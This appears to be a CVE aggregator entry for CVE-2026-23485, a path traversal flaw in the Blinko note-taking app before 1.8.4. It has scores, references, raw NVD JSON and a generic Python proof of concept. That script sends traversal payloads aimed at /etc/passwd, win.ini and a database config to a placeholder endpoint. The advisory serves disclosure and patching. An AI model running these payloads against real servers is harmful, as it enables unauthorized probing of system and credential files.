CVE-2026-23485

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the filePath parameter accepts path traversal sequences, allowing enumeration of file existence on the server via different error responses. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE

Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-ip:port/api/vulnerable_endpoint"

# Malicious payload attempting to traverse directories
# Testing for common linux files like /etc/passwd
payloads = [
    "../../../etc/passwd",
    "..\..\..\windows\win.ini",
    "../../../app/config/database.yml"
]

for payload in payloads:
    params = {
        "filePath": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=5)
        # Analyze response based on CVE description: different errors for existence
        if response.status_code == 200:
            print(f"[+] Potential hit with payload: {payload}")
            print(f"Response snippet: {response.text[:100]}")
        elif "File not found" in response.text or response.status_code == 404:
            print(f"[-] File not found for payload: {payload}")
        else:
            print(f"[?] Status {response.status_code} for payload: {payload}")
    except Exception as e:
        print(f"Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23485
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23485
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23485/
[4] VulDB https://vuldb.com/cve/CVE-2026-23485
[5] https://github.com/blinkospace/blinko/commit/9d6fa80a3e11a99886f90e048657443335fd3e7d
[6] https://github.com/blinkospace/blinko/releases/tag/1.8.4
[7] https://github.com/blinkospace/blinko/security/advisories/GHSA-5x64-pmfq-pw7q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23485", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:02.840", "lastModified": "2026-03-24T18:05:18.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the filePath parameter accepts path traversal sequences, allowing enumeration of file existence on the server via different error responses. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, el parámetro filePath acepta secuencias de salto de ruta, permitiendo la enumeración de la existencia de archivos en el servidor a través de diferentes respuestas de error. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/9d6fa80a3e11a99886f90e048657443335fd3e7d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-5x64-pmfq-pw7q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}